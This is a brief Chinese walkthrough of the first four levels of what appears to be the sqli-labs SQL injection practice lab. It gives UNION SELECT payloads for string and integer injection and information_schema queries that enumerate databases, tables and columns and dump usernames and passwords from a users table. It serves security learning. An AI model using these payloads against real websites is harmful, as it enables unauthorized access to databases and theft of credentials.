Less1
很简单的判断出来是字符型注入,字段判断为3,然后union注入看下当前数据库,爆数据库,爆表,爆表字段名,爆内容
payload:
?id=-1' union select 1,2,3--+
Less2
很简单判断出来是整数型注入,接下来步骤与Less1一样
payload:
?id=-1 union select 1,2,3--+
Less3
字符型注入,字符内容是被('内容')
这样包起来的,接下来步骤与Less1一样
payload:
?id=-1') union select 1,2,3--+
Less4
字符型注入,字符内容是被("内容")
这样包起来的,接下来步骤与Less1一样
payload:
?id=-1") union select 1,2,3--+
爆数据库
group_concat(schema_name)from information_schema.schemata
爆表
group_concat(table_name) from information_schema.tables where table_schema='security'
爆字段
group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'
爆内容
group_concat(id,username,password) from security.users